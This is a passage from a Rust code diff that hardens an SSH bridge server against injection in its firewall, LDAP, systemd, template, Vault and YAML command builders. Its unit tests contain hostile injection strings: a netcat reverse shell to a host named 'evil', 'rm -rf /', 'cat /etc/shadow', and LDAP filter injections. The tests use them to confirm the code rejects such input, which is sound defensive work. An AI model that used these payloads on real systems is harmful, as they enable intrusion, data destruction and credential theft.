Returns [`BridgeError::CommandDenied`] if a variable key is not a valid POSIX env-var name. pub fn build_template_command( template_path: &str, output_path: &str, variables: &[(String, String)], - ) -> String { + ) -> Result { let escaped_template = shell_escape(template_path); let escaped_output = shell_escape(output_path); - // Build env var exports - let exports: Vec = variables - .iter() - .map(|(k, v)| { - let escaped_v = shell_escape(v); - format!("export {k}={escaped_v}") - }) - .collect(); + let mut exports: Vec = Vec::with_capacity(variables.len()); + for (k, v) in variables { + validate_env_var_name(k)?; + let escaped_v = shell_escape(v); + exports.push(format!("export {k}={escaped_v}")); + } let export_str = if exports.is_empty() { String::new() @@ -54,9 +71,9 @@ impl FileAdvancedCommandBuilder { format!("{} && ", exports.join(" && ")) }; - format!( + Ok(format!( "{export_str}envsubst < {escaped_template} > {escaped_output} && echo 'Template rendered to {output_path}'" - ) + )) } } @@ -100,7 +117,8 @@ mod tests { "/etc/nginx/template.conf", "/etc/nginx/site.conf", &vars, - ); + ) + .unwrap(); assert!(cmd.contains("envsubst")); assert!(cmd.contains("SERVER_NAME")); assert!(cmd.contains("export")); @@ -109,8 +127,45 @@ mod tests { #[test] fn test_template_command_no_vars() { let cmd = - FileAdvancedCommandBuilder::build_template_command("/etc/template", "/etc/output", &[]); + FileAdvancedCommandBuilder::build_template_command("/etc/template", "/etc/output", &[]) + .unwrap(); assert!(cmd.contains("envsubst")); assert!(!cmd.contains("export")); } + + #[test] + fn test_template_command_rejects_injected_var_name() { + let vars = vec![("FOO; bash -c 'evil' #".to_string(), "x".to_string())]; + let r = FileAdvancedCommandBuilder::build_template_command( + "/etc/template.conf", + "/tmp/out", + &vars, + ); + assert!(r.is_err(), "must reject keys with shell metacharacters"); + } + + #[test] + fn test_template_command_rejects_lowercase_or_digit_first() { + for bad in ["1FOO", "foo bar", "BAD-NAME", "WITH$DOLLAR", ""] { + let vars = vec![(bad.to_string(), "x".to_string())]; + let r = FileAdvancedCommandBuilder::build_template_command("/etc/t", "/tmp/o", &vars); + assert!(r.is_err(), "key {bad:?} must be rejected"); + } + } + + #[test] + fn test_template_command_accepts_posix_names() { + for ok in [ + "FOO", + "FOO_BAR", + "_LEADING", + "X1", + "A_B_C_123", + "lowercase_ok", + ] { + let vars = vec![(ok.to_string(), "x".to_string())]; + let r = FileAdvancedCommandBuilder::build_template_command("/etc/t", "/tmp/o", &vars); + assert!(r.is_ok(), "key {ok} must be accepted"); + } + } } diff --git a/src/domain/use_cases/firewall.rs b/src/domain/use_cases/firewall.rs index 414d9780..f9f2f990 100644 --- a/src/domain/use_cases/firewall.rs +++ b/src/domain/use_cases/firewall.rs @@ -78,6 +78,14 @@ pub fn validate_port(port: &str) -> Result<()> { }) } +fn validate_protocol(p: &str) -> Result<()> { + matches!(p, "tcp" | "udp" | "icmp" | "icmpv6") + .then_some(()) + .ok_or_else(|| BridgeError::CommandDenied { + reason: format!("Invalid firewall protocol '{p}'. Allowed: tcp|udp|icmp|icmpv6"), + }) +} + /// Validate that a source address looks like a valid IP or CIDR. /// /// # Errors @@ -166,6 +174,9 @@ impl FirewallCommandBuilder { source: Option<&str>, ) -> Result { validate_port(port)?; + if let Some(p) = protocol { + validate_protocol(p)?; + } if let Some(src) = source { validate_source(src)?; } @@ -238,6 +249,9 @@ impl FirewallCommandBuilder { source: Option<&str>, ) -> Result { validate_port(port)?; + if let Some(p) = protocol { + validate_protocol(p)?; + } if let Some(src) = source { validate_source(src)?; } @@ -628,4 +642,37 @@ mod tests { fn test_validate_port_service_with_hyphens() { assert!(validate_port("my-custom-service").is_ok()); } + + // ============== Protocol Injection Prevention (Vuln 7) ============== + + #[test] + fn test_allow_rejects_protocol_injection() { + let r = FirewallCommandBuilder::build_allow_command( + None, + "80", + Some("tcp -j ACCEPT; nc -e /bin/sh evil 9; iptables -A INPUT -p tcp"), + None, + ); + assert!(r.is_err(), "must reject injection in protocol"); + } + + #[test] + fn test_deny_rejects_protocol_injection() { + let r = FirewallCommandBuilder::build_deny_command(None, "80", Some("udp; rm -rf /"), None); + assert!(r.is_err()); + } + + #[test] + fn test_allow_accepts_known_protocols() { + for p in ["tcp", "udp", "icmp", "icmpv6"] { + let r = FirewallCommandBuilder::build_allow_command(Some("ufw"), "80", Some(p), None); + assert!(r.is_ok(), "{p} should be accepted"); + } + } + + #[test] + fn test_allow_rejects_unknown_protocol() { + let r = FirewallCommandBuilder::build_allow_command(Some("ufw"), "80", Some("sctp"), None); + assert!(r.is_err(), "sctp is not in the allowlist"); + } } diff --git a/src/domain/use_cases/ldap.rs b/src/domain/use_cases/ldap.rs index 6bda6ad0..c44ef7ff 100644 --- a/src/domain/use_cases/ldap.rs +++ b/src/domain/use_cases/ldap.rs @@ -10,6 +10,24 @@ fn shell_escape(s: &str) -> String { super::shell::escape(s, ShellType::Posix) } +/// Escape a value for safe inclusion inside an LDAP filter (RFC 4515 §3). +/// +/// Encodes the four filter metacharacters `( ) * \` plus NUL. +fn ldap_filter_escape(value: &str) -> String { + let mut out = String::with_capacity(value.len()); + for b in value.bytes() { + match b { + b'(' => out.push_str(r"\28"), + b')' => out.push_str(r"\29"), + b'*' => out.push_str(r"\2a"), + b'\\' => out.push_str(r"\5c"), + 0 => out.push_str(r"\00"), + _ => out.push(b as char), + } + } + out +} + /// Builds LDAP CLI commands for remote execution. pub struct LdapCommandBuilder; @@ -44,14 +62,14 @@ impl LdapCommandBuilder { /// Build an ldapsearch for a specific user. #[must_use] pub fn build_user_info_command(base_dn: &str, username: &str, uri: Option<&str>) -> String { - let filter = format!("(uid={username})"); + let filter = format!("(uid={})", ldap_filter_escape(username)); Self::build_search_command(base_dn, Some(&filter), None, Some("sub"), uri) } /// Build an ldapsearch for group members. #[must_use] pub fn build_group_members_command(base_dn: &str, group: &str, uri: Option<&str>) -> String { - let filter = format!("(cn={group})"); + let filter = format!("(cn={})", ldap_filter_escape(group)); Self::build_search_command( base_dn, Some(&filter), @@ -143,4 +161,44 @@ mod tests { assert!(cmd.contains("ldapmodify")); assert!(cmd.contains("-H")); } + + #[test] + fn test_user_info_escapes_filter_metacharacters() { + let cmd = + LdapCommandBuilder::build_user_info_command("dc=example,dc=com", "*)(uid=*", None); + assert!( + !cmd.contains("(uid=*)(uid=*"), + "raw injection must not appear" + ); + assert!(cmd.contains(r"\2a"), "asterisk must be RFC 4515 encoded"); + assert!( + cmd.contains(r"\28") || cmd.contains(r"\29"), + "parens must be encoded" + ); + } + + #[test] + fn test_group_members_escapes_filter_metacharacters() { + let cmd = LdapCommandBuilder::build_group_members_command( + "dc=example,dc=com", + "admins)(member=*", + None, + ); + assert!(!cmd.contains("(cn=admins)(member=")); + assert!(cmd.contains(r"\29")); + } + + #[test] + fn test_user_info_passthrough_clean_value() { + let cmd = LdapCommandBuilder::build_user_info_command("dc=example,dc=com", "alice", None); + // The filter string can be quoted by shell_escape, so accept either form. + assert!(cmd.contains("(uid=alice)") || cmd.contains("'(uid=alice)'")); + } + + #[test] + fn test_group_members_passthrough_clean_value() { + let cmd = + LdapCommandBuilder::build_group_members_command("dc=example,dc=com", "admins", None); + assert!(cmd.contains("(cn=admins)") || cmd.contains("'(cn=admins)'")); + } } diff --git a/src/domain/use_cases/systemd.rs b/src/domain/use_cases/systemd.rs index 507e20fd..93aa25e2 100644 --- a/src/domain/use_cases/systemd.rs +++ b/src/domain/use_cases/systemd.rs @@ -130,9 +130,17 @@ impl SystemdCommandBuilder { /// /// Constructs: `systemctl list-units --type=service [--state={s}] /// [--all] --no-pager --no-legend` - #[must_use] - pub fn build_list_command(state: Option<&str>, all: bool, unit_type: Option<&str>) -> String { + /// + /// # Errors + /// + /// Returns [`BridgeError::CommandDenied`] if `unit_type` is not in the allowlist. + pub fn build_list_command( + state: Option<&str>, + all: bool, + unit_type: Option<&str>, + ) -> Result { let utype = unit_type.unwrap_or("service"); + Self::validate_unit_type(utype)?; let mut cmd = format!("systemctl list-units --type={utype}"); if let Some(s) = state { @@ -144,7 +152,38 @@ impl SystemdCommandBuilder { } cmd.push_str(" --no-pager --no-legend"); - cmd + Ok(cmd) + } + + /// Validate a systemd unit type against an allowlist. + /// + /// Allowed: `service`, `socket`, `timer`, `mount`, `target`, `automount`, + /// `path`, `slice`, `scope`, `device`, `swap`. + /// + /// # Errors + /// + /// Returns [`BridgeError::CommandDenied`] if the unit type is not in the allowlist. + fn validate_unit_type(t: &str) -> Result<()> { + matches!( + t, + "service" + | "socket" + | "timer" + | "mount" + | "target" + | "automount" + | "path" + | "slice" + | "scope" + | "device" + | "swap" + ) + .then_some(()) + .ok_or_else(|| BridgeError::CommandDenied { + reason: format!( + "Invalid systemd unit_type '{t}'. Allowed: service|socket|timer|mount|target|automount|path|slice|scope|device|swap" + ), + }) } /// Build a `journalctl` command for service logs. @@ -275,7 +314,7 @@ mod tests { #[test] fn test_list_command_minimal() { - let cmd = SystemdCommandBuilder::build_list_command(None, false, None); + let cmd = SystemdCommandBuilder::build_list_command(None, false, None).unwrap(); assert_eq!( cmd, "systemctl list-units --type=service --no-pager --no-legend" @@ -284,19 +323,19 @@ mod tests { #[test] fn test_list_command_with_state() { - let cmd = SystemdCommandBuilder::build_list_command(Some("running"), false, None); + let cmd = SystemdCommandBuilder::build_list_command(Some("running"), false, None).unwrap(); assert!(cmd.contains("--state='running'")); } #[test] fn test_list_command_all() { - let cmd = SystemdCommandBuilder::build_list_command(None, true, None); + let cmd = SystemdCommandBuilder::build_list_command(None, true, None).unwrap(); assert!(cmd.contains("--all")); } #[test] fn test_list_command_custom_type() { - let cmd = SystemdCommandBuilder::build_list_command(None, false, Some("timer")); + let cmd = SystemdCommandBuilder::build_list_command(None, false, Some("timer")).unwrap(); assert!(cmd.contains("--type=timer")); } @@ -437,7 +476,8 @@ mod tests { #[test] fn test_list_injection_in_state() { - let cmd = SystemdCommandBuilder::build_list_command(Some("running; whoami"), false, None); + let cmd = SystemdCommandBuilder::build_list_command(Some("running; whoami"), false, None) + .unwrap(); assert!(cmd.contains("--state='running; whoami'")); } @@ -445,7 +485,8 @@ mod tests { #[test] fn test_list_all_options() { - let cmd = SystemdCommandBuilder::build_list_command(Some("running"), true, Some("socket")); + let cmd = SystemdCommandBuilder::build_list_command(Some("running"), true, Some("socket")) + .unwrap(); assert!(cmd.contains("--type=socket")); assert!(cmd.contains("--state='running'")); assert!(cmd.contains("--all")); @@ -590,4 +631,46 @@ mod tests { let cmd = SystemdCommandBuilder::build_daemon_reload_command(); assert_eq!(cmd, "systemctl daemon-reload"); } + + // ============== unit_type allowlist (Vuln 6) ============== + + #[test] + fn test_list_command_rejects_injection_in_unit_type() { + let r = SystemdCommandBuilder::build_list_command( + None, + false, + Some("service; cat /etc/shadow #"), + ); + assert!( + r.is_err(), + "must reject unit_type with shell metacharacters" + ); + } + + #[test] + fn test_list_command_accepts_known_unit_types() { + for t in [ + "service", + "socket", + "timer", + "mount", + "target", + "automount", + "path", + "slice", + "scope", + "device", + "swap", + ] { + let r = SystemdCommandBuilder::build_list_command(None, false, Some(t)); + assert!(r.is_ok(), "{t} should be accepted"); + } + } + + #[test] + fn test_list_command_default_no_unit_type() { + let r = SystemdCommandBuilder::build_list_command(None, false, None); + assert!(r.is_ok()); + assert!(r.unwrap().contains("--type=service")); + } } diff --git a/src/domain/use_cases/templates.rs b/src/domain/use_cases/templates.rs index c7a0e395..7ee2aeb8 100644 --- a/src/domain/use_cases/templates.rs +++ b/src/domain/use_cases/templates.rs @@ -131,6 +131,10 @@ impl TemplateCommandBuilder { /// Build a command to apply template content to a destination file. /// /// If `backup` is true, creates a `.bak` copy before overwriting. + /// + /// The heredoc terminator is randomized per call (`MCP_EOF_{uuid}`) + /// and re-rolled on the astronomically rare collision with any body line, + /// so a malicious `content` cannot close the heredoc and inject shell. #[must_use] pub fn build_template_apply_command(content: &str, dest: &str, backup: bool) -> String { let escaped_dest = shell_escape(dest); @@ -138,9 +142,17 @@ impl TemplateCommandBuilder { if backup { let _ = write!(cmd, "cp {escaped_dest} {escaped_dest}.bak 2>/dev/null; "); } + + let terminator = loop { + let candidate = format!("MCP_EOF_{}", uuid::Uuid::new_v4().simple()); + if !content.lines().any(|l| l == candidate) { + break candidate; + } + }; + let _ = write!( cmd, - "cat > {escaped_dest} << 'TEMPLATE_EOF'\n{content}\nTEMPLATE_EOF" + "cat > {escaped_dest} << '{terminator}'\n{content}\n{terminator}" ); cmd } @@ -345,6 +357,14 @@ mod tests { // ============== Apply Command ============== + /// Helper for tests: extract the heredoc terminator (the token between + /// `<< '` and the next `'`) from a built apply command. + fn extract_terminator(cmd: &str) -> &str { + let start = cmd.find("<< '").expect("heredoc opening present") + 4; + let end = cmd[start..].find('\'').expect("terminator close quote") + start; + &cmd[start..end] + } + #[test] fn test_apply_command_no_backup() { let cmd = TemplateCommandBuilder::build_template_apply_command( @@ -352,7 +372,8 @@ mod tests { "/etc/nginx/nginx.conf", false, ); - assert!(cmd.contains("TEMPLATE_EOF")); + let terminator = extract_terminator(&cmd); + assert!(cmd.contains(terminator)); assert!(cmd.contains("server { listen 80; }")); assert!(!cmd.contains(".bak")); } @@ -364,8 +385,9 @@ mod tests { "/etc/nginx/nginx.conf", true, ); + let terminator = extract_terminator(&cmd); assert!(cmd.contains(".bak")); - assert!(cmd.contains("TEMPLATE_EOF")); + assert!(cmd.contains(terminator)); assert!(cmd.contains("cp ")); } @@ -379,6 +401,49 @@ mod tests { assert!(cmd.contains("'/tmp/test; rm -rf /'")); } + #[test] + fn test_template_apply_uses_unique_terminator() { + let cmd = TemplateCommandBuilder::build_template_apply_command( + "hello\nTEMPLATE_EOF\nbash -c 'evil'", + "/etc/site.conf", + false, + ); + // Extract the terminator: the token after `<< '` and before the next `'`. + let start = cmd.find("<< '").expect("heredoc opening present") + 4; + let end = cmd[start..].find('\'').expect("terminator close quote") + start; + let terminator = &cmd[start..end]; + + // The terminator must not appear as a sole line in the body. + let body_start = cmd.find('\n').expect("body has newline") + 1; + let body_end = cmd + .rfind(&format!("\n{terminator}")) + .expect("closing terminator"); + let body = &cmd[body_start..body_end]; + assert!( + !body.lines().any(|l| l == terminator), + "terminator {terminator} must not appear as a sole line in body" + ); + // Sanity: the literal old default 'TEMPLATE_EOF' is in the BODY (the attacker payload). + // Reject builds that still emit that as the actual heredoc terminator. + assert_ne!(terminator, "TEMPLATE_EOF"); + } + + #[test] + fn test_template_apply_terminators_are_unique_per_call() { + let a = TemplateCommandBuilder::build_template_apply_command("a", "/x", false); + let b = TemplateCommandBuilder::build_template_apply_command("a", "/x", false); + assert_ne!(a, b, "calls must use different terminators"); + } + + #[test] + fn test_template_apply_backup_branch_still_works() { + let cmd = + TemplateCommandBuilder::build_template_apply_command("body", "/etc/foo.conf", true); + assert!(cmd.starts_with("cp ")); + assert!(cmd.contains(".bak 2>/dev/null;")); + assert!(cmd.contains("cat > '/etc/foo.conf'")); + } + // ============== Validate Command ============== #[test] diff --git a/src/domain/use_cases/vault.rs b/src/domain/use_cases/vault.rs index 7646c4b3..732f1233 100644 --- a/src/domain/use_cases/vault.rs +++ b/src/domain/use_cases/vault.rs @@ -137,13 +137,34 @@ impl VaultCommandBuilder { /// Build a `vault kv put` command. /// - /// Constructs: `vault kv put [-mount={mount}] {path} {key=value}...` + /// Constructs: + /// ```text + /// vault kv put [-mount={mount}] {path} - <<'VAULT_DATA_EOF_' + /// k1=v1 + /// k2=v2 + /// VAULT_DATA_EOF_ + /// ``` + /// + /// **FIND-031 (Sprint 2 Task 21):** the `key=value` pairs are piped via + /// stdin (`-` argument + heredoc) instead of being appended to argv. + /// The previous shape `vault kv put path key=secret_value` exposed every + /// secret value to anyone running `ps eww` on the remote host for the + /// lifetime of the vault process. The heredoc body is shell-literal + /// (single-quoted terminator, no expansion) and the terminator is + /// randomized per call to defeat any value that tries to close the + /// heredoc early. Same pattern as `template_apply` (commit 2da5d55). + /// + /// `data` carries `key=value` pairs; values are typically secrets, so the + /// caller is expected to pass `Zeroizing` (FIND-030) to avoid + /// gratuitous heap residency. The slice is borrowed immutably here; the + /// owner controls when the secret bytes are wiped. + /// /// # Errors /// /// Returns [`BridgeError::CommandDenied`] if `path` contains unsafe characters. pub fn build_write_command( path: &str, - data: &[String], + data: &[zeroize::Zeroizing], vault_addr: Option<&str>, mount: Option<&str>, ) -> Result { @@ -162,9 +183,26 @@ impl VaultCommandBuilder { let _ = write!(cmd, " {}", shell_escape(path)); + // FIND-031: pipe data via stdin heredoc. Terminator is randomized + // and re-rolled if any value happens to contain a line equal to the + // candidate terminator (astronomically unlikely with a UUID, but + // defended in depth — an attacker who controls a value could + // otherwise close the heredoc early). + let terminator = loop { + let candidate = format!("VAULT_DATA_EOF_{}", uuid::Uuid::new_v4().simple()); + if !data + .iter() + .any(|kv| kv.lines().any(|l| l == candidate.as_str())) + { + break candidate; + } + }; + + let _ = writeln!(cmd, " - <<'{terminator}'"); for kv in data { - let _ = write!(cmd, " {}", shell_escape(kv)); + let _ = writeln!(cmd, "{}", kv.as_str()); } + cmd.push_str(&terminator); Ok(cmd) } @@ -257,17 +295,23 @@ mod tests { #[test] fn test_write_simple() { - let data = vec!["username=admin".to_string(), "password=secret".to_string()]; + let data = vec![ + zeroize::Zeroizing::new("username=admin".to_string()), + zeroize::Zeroizing::new("password=secret".to_string()), + ]; let cmd = VaultCommandBuilder::build_write_command("secret/myapp", &data, None, None).unwrap(); - assert!(cmd.contains("vault kv put 'secret/myapp'")); - assert!(cmd.contains("'username=admin'")); - assert!(cmd.contains("'password=secret'")); + // FIND-031: argv is `vault kv put 'path' - <<'TERMINATOR'`; values + // live in the heredoc body, not as argv-visible `key=value` pairs. + assert!(cmd.contains("vault kv put 'secret/myapp' - <<")); + // Body is shell-literal — values appear verbatim, not single-quoted. + assert!(cmd.contains("\nusername=admin\n")); + assert!(cmd.contains("\npassword=secret\n")); } #[test] fn test_write_with_mount() { - let data = vec!["key=value".to_string()]; + let data = vec![zeroize::Zeroizing::new("key=value".to_string())]; let cmd = VaultCommandBuilder::build_write_command("myapp/config", &data, None, Some("kv")) .unwrap(); assert!(cmd.contains("-mount='kv'")); @@ -284,10 +328,15 @@ mod tests { #[test] fn test_write_injection_in_data_value() { - let data = vec!["password=s3cr3t; rm -rf /".to_string()]; + let data = vec![zeroize::Zeroizing::new( + "password=s3cr3t; rm -rf /".to_string(), + )]; let cmd = VaultCommandBuilder::build_write_command("secret/app", &data, None, None).unwrap(); - assert!(cmd.contains("'password=s3cr3t; rm -rf /'")); + // FIND-031: value is a heredoc body line (single-quoted terminator + // disables shell expansion), so `;` and `rm -rf /` are literal data, + // not shell metacharacters. Verify the line shape. + assert!(cmd.contains("\npassword=s3cr3t; rm -rf /\n")); } #[test] @@ -339,7 +388,10 @@ mod tests { #[test] fn test_write_all_options() { - let data = vec!["user=admin".to_string(), "pass=secret".to_string()]; + let data = vec![ + zeroize::Zeroizing::new("user=admin".to_string()), + zeroize::Zeroizing::new("pass=secret".to_string()), + ]; let cmd = VaultCommandBuilder::build_write_command( "secret/myapp", &data, @@ -350,8 +402,9 @@ mod tests { assert!(cmd.contains("VAULT_ADDR='https://vault:8200'")); assert!(cmd.contains("-mount='kv'")); assert!(cmd.contains("'secret/myapp'")); - assert!(cmd.contains("'user=admin'")); - assert!(cmd.contains("'pass=secret'")); + // FIND-031: values are heredoc body lines, not argv args. + assert!(cmd.contains("\nuser=admin\n")); + assert!(cmd.contains("\npass=secret\n")); } #[test] @@ -366,26 +419,33 @@ mod tests { #[test] fn test_write_empty_data() { - let data: Vec = vec![]; + let data: Vec> = vec![]; let cmd = VaultCommandBuilder::build_write_command("secret/myapp", &data, None, None).unwrap(); - assert!(cmd.contains("vault kv put 'secret/myapp'")); + // FIND-031: even with no data, the heredoc structure is still produced + // (vault accepts an empty body — a no-op write). + assert!(cmd.contains("vault kv put 'secret/myapp' - <<")); } #[test] fn test_write_single_data_item() { - let data = vec!["key=val".to_string()]; + let data = vec![zeroize::Zeroizing::new("key=val".to_string())]; let cmd = VaultCommandBuilder::build_write_command("secret/myapp", &data, None, None).unwrap(); - assert!(cmd.contains("'secret/myapp' 'key=val'")); + // FIND-031: shape is `... 'secret/myapp' - <<'TERMINATOR'\nkey=val\nTERMINATOR`. + assert!(cmd.contains("'secret/myapp' - <<")); + assert!(cmd.contains("\nkey=val\n")); } #[test] fn test_write_data_with_single_quotes() { - let data = vec!["msg=it's secret".to_string()]; + let data = vec![zeroize::Zeroizing::new("msg=it's secret".to_string())]; let cmd = VaultCommandBuilder::build_write_command("secret/app", &data, None, None).unwrap(); - assert!(cmd.contains("it'\\''s secret")); + // FIND-031: heredoc body is shell-literal; the apostrophe is preserved + // verbatim, no shell-escape needed (the single-quoted terminator + // disables expansion). + assert!(cmd.contains("\nmsg=it's secret\n")); } #[test] @@ -445,4 +505,61 @@ mod tests { assert!(validate_vault_path("secret/v1.0/config").is_ok()); assert!(validate_vault_path("secret/my.app").is_ok()); } + + // ============== FIND-031: argv leak prevention ============== + + /// FIND-031: secrets must not appear as `vault kv put path KEY=VALUE` + /// because the remote process's `ps eww` would expose `VALUE`. + /// Instead the builder pipes a stdin heredoc whose body is shell-literal + /// (single-quoted terminator), so `VALUE` lives in the kernel pipe buffer + /// and never in argv. + #[test] + fn vault_write_excludes_secret_value_from_argv() { + let data = vec![zeroize::Zeroizing::new("k=topsecret".to_string())]; + let cmd = + VaultCommandBuilder::build_write_command("secret/foo", &data, None, None).unwrap(); + + // Split on `<<` — anything before is argv, anything after is the + // heredoc construct (terminator + body). Secret may appear in the + // body, never in argv. + let argv_only = cmd.split("<<").next().unwrap(); + assert!( + !argv_only.contains("topsecret"), + "FIND-031: secret leaked into argv portion of command: {cmd}" + ); + } + + /// FIND-031: the builder must use a stdin pipe (`-` argument + heredoc). + #[test] + fn vault_write_uses_stdin_heredoc() { + let data = vec![zeroize::Zeroizing::new("k=v".to_string())]; + let cmd = + VaultCommandBuilder::build_write_command("secret/foo", &data, None, None).unwrap(); + + assert!( + cmd.contains("vault kv put"), + "command must still invoke vault kv put: {cmd}" + ); + // The dash signals "read key=value lines from stdin" to vault. + assert!( + cmd.contains(" - <<"), + "FIND-031: must pipe data via stdin heredoc, got: {cmd}" + ); + } + + /// FIND-031: heredoc terminator is randomized so a malicious value + /// cannot close the heredoc early and inject shell. Same pattern as + /// `template_apply` (commit 2da5d55). + #[test] + fn vault_write_heredoc_terminator_is_randomized() { + let data = vec![zeroize::Zeroizing::new("k=v".to_string())]; + let cmd1 = + VaultCommandBuilder::build_write_command("secret/foo", &data, None, None).unwrap(); + let cmd2 = + VaultCommandBuilder::build_write_command("secret/foo", &data, None, None).unwrap(); + assert_ne!( + cmd1, cmd2, + "heredoc terminator must be re-rolled per call to defeat injection" + ); + } } diff --git a/src/domain/yaml.rs b/src/domain/yaml.rs new file mode 100644 index 00000000..00d007e9 --- /dev/null +++ b/src/domain/yaml.rs @@ -0,0 +1,108 @@ +//! Centralized YAML parser with `DoS` hardening (Budget / depth / size limits). +//! +//! All production-path `serde_saphyr::from_str` calls in the codebase MUST go +//! through here so the anti-DoS caps cannot be forgotten at an individual call +//! site (FIND-001 / FIND-002 / FIND-004 / FIND-032). +//! +//! `serde-saphyr` already enables a default [`serde_saphyr::Budget`] for +//! `from_str`, but the defaults are tuned for a generic, fairly liberal +//! workload (256 MiB, 50 000 anchors, depth 2 000, 250 000 nodes). Our +//! threat model — config / runbook YAML, plus YAML stdout from a single SSH +//! command — never legitimately needs anywhere near that. We therefore +//! tighten the budget aggressively to cut down billion-laughs and depth-bomb +//! amplification factors. +//! +//! Limits enforced (per call): +//! - max input size: [`MAX_YAML_BYTES`] (1 MiB) +//! - max anchors: 100 +//! - max alias events: 1 000 +//! - max structural depth: 50 +//! - max nodes (sequences + maps + scalars): 10 000 +//! +//! Test fixtures inside `#[cfg(test)] mod tests` blocks intentionally keep +//! using the bare `serde_saphyr::from_str` so they can exercise edge cases +//! that would otherwise be rejected by these caps. + +use serde::de::DeserializeOwned; + +use crate::error::BridgeError; + +/// Hard upper bound on a YAML input we will accept from any source. +/// +/// Both the in-process length check and saphyr's own +/// `max_reader_input_bytes` use this constant, so the rejection happens at +/// the earliest possible point. +pub(crate) const MAX_YAML_BYTES: usize = 1_048_576; // 1 MiB + +/// Maximum distinct `&anchor` definitions before we reject the document. +pub(crate) const MAX_ANCHORS: usize = 100; + +/// Maximum alias (`*ref`) events. Caps amplification on any anchor. +pub(crate) const MAX_ALIASES: usize = 1_000; + +/// Maximum structural nesting depth (sequences + mappings). +pub(crate) const MAX_DEPTH: usize = 50; + +/// Maximum total parser nodes (sequence-start / map-start / scalar events). +pub(crate) const MAX_NODES: usize = 10_000; + +/// Build the hardened parser options for our threat model. +fn hardened_options() -> serde_saphyr::Options { + let budget = serde_saphyr::Budget { + max_reader_input_bytes: Some(MAX_YAML_BYTES), + max_anchors: MAX_ANCHORS, + max_aliases: MAX_ALIASES, + max_depth: MAX_DEPTH, + max_nodes: MAX_NODES, + ..serde_saphyr::Budget::default() + }; + + serde_saphyr::Options { + budget: Some(budget), + ..serde_saphyr::Options::default() + } +} + +/// Parse YAML into `T` with anti-DoS budget caps. +/// +/// # Errors +/// +/// Returns [`BridgeError::Config`] when: +/// - the input exceeds [`MAX_YAML_BYTES`], +/// - the input trips any saphyr [`Budget`](serde_saphyr::Budget) limit +/// (anchor count, alias count, depth, node count, total scalar bytes), +/// - the input is not valid YAML or does not match the target type `T`. +pub fn parse_yaml(input: &str) -> Result { + if input.len() > MAX_YAML_BYTES { + return Err(BridgeError::Config(format!( + "YAML input too large: {} bytes (max {})", + input.len(), + MAX_YAML_BYTES + ))); + } + + serde_saphyr::from_str_with_options(input, hardened_options()) + .map_err(|e| BridgeError::Config(format!("YAML parse error: {e}"))) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn rejects_oversize_input() { + // 1 MiB + 1 byte: just over the cap. + let input = "x".repeat(MAX_YAML_BYTES + 1); + let out: Result = parse_yaml(&input); + match out { + Err(BridgeError::Config(msg)) => assert!(msg.contains("too large")), + other => panic!("expected Config error, got {other:?}"), + } + } + + #[test] + fn small_input_round_trips() { + let v: serde_json::Value = parse_yaml("k: v\n").expect("parse"); + assert_eq!(v["k"], "v"); + } +} diff --git a/src/domain/yq_filter.rs b/src/domain/yq_filter.rs index d382de78..3a22e945 100644 --- a/src/domain/yq_filter.rs +++ b/src/domain/yq_filter.rs @@ -39,7 +39,7 @@ pub fn apply_yq_filter_tsv(input: &str, filter_expr: &str) -> Result { /// Parse YAML to a `serde_json::Value` tree, then re-serialize to a /// JSON string suitable for the jq engine. fn yaml_to_json_string(yaml: &str) -> Result { - let value: serde_json::Value = serde_saphyr::from_str(yaml).map_err(|e| { + let value: serde_json::Value = super::yaml::parse_yaml(yaml).map_err(|e| { BridgeError::McpInvalidRequest(format!( "yq_filter requires YAML input, but failed to parse: {e}" )) diff --git a/src/lib.rs b/src/lib.rs index 41951bf7..2ff605f7 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -33,6 +33,7 @@ pub mod domain; pub mod error; pub mod mcp; pub mod metrics; +pub mod path_utils; pub mod ports; pub mod security; pub mod ssh; diff --git a/src/main.rs b/src/main.rs index 833ba737..c77def97 100644 --- a/src/main.rs +++ b/src/main.rs @@ -60,7 +60,10 @@ async fn main() -> Result<()> { server.run(audit_task, Some(&config_path)).await?; } #[cfg(feature = "http")] - Some(Commands::ServeHttp { bind }) => { + Some(Commands::ServeHttp { + bind, + insecure_bind, + }) => { use mcp_ssh_bridge::mcp::transport::http as http_transport; use mcp_ssh_bridge::mcp::transport::oauth::OAuthConfig as TransportOAuthConfig; @@ -74,6 +77,13 @@ async fn main() -> Result<()> { jwks_uri: config.http.oauth.jwks_uri.clone(), client_id: config.http.oauth.client_id.clone(), required_scopes: config.http.oauth.required_scopes.clone(), + static_keys: config + .http + .oauth + .static_keys + .iter() + .map(|k| (k.kid.clone(), k.public_key_pem.clone())) + .collect(), }; let http_config = http_transport::HttpTransportConfig { @@ -85,6 +95,7 @@ async fn main() -> Result<()> { max_sessions: config.http.max_sessions, oauth, allowed_origins: config.http.allowed_origins.clone(), + allow_unsafe_bind: insecure_bind || config.http.allow_unsafe_bind, }; http_transport::serve(server, http_config).await?; diff --git a/src/mcp/elicitation.rs b/src/mcp/elicitation.rs index 69ac29ef..b153075f 100644 --- a/src/mcp/elicitation.rs +++ b/src/mcp/elicitation.rs @@ -422,20 +422,33 @@ mod tests { /// Resolve the most-recently-issued pending request with the given /// JSON-RPC response value. Used by the decline/cancel tests. - fn resolve_only_pending(pending: &PendingRequests, response: Value) { - // The test never has more than one in-flight request at a time, - // so we discover the id by issuing a `create_request` and - // resolving the *previous* one. Cleaner: use the locked - // hashmap directly via `len()` and resolve "srv-1" since the - // counter starts at 1. + /// + /// IDs are now UUID-based (Vuln 8, audit 2026-05-09), so we cannot + /// hard-code `"srv-1"`. Tests pass the id observed on the writer + /// channel (extracted via `extract_outbound_id`). + fn resolve_only_pending(pending: &PendingRequests, id: &str, response: Value) { assert_eq!(pending.len(), 1, "exactly one request must be in flight"); let resolved = pending.resolve( - "srv-1", + id, crate::mcp::pending_requests::ClientResponse::Success(response), ); assert!(resolved, "must resolve the pending request"); } + /// Pull the request id out of an outbound `WriterMessage::Request`, + /// stringifying it the same way `route_incoming_message` does so + /// `pending.resolve` lookups match. + fn extract_outbound_id(msg: &super::super::protocol::WriterMessage) -> String { + if let super::super::protocol::WriterMessage::Request(req) = msg { + return match &req.id { + Value::String(s) => s.clone(), + other => other.to_string(), + }; + } + let _ = msg; + panic!("expected WriterMessage::Request, got a different WriterMessage variant"); + } + /// `delete match arm "decline"` on line 81 must change behavior: /// without the arm, a `decline` action falls through to `Ok(result)` /// instead of 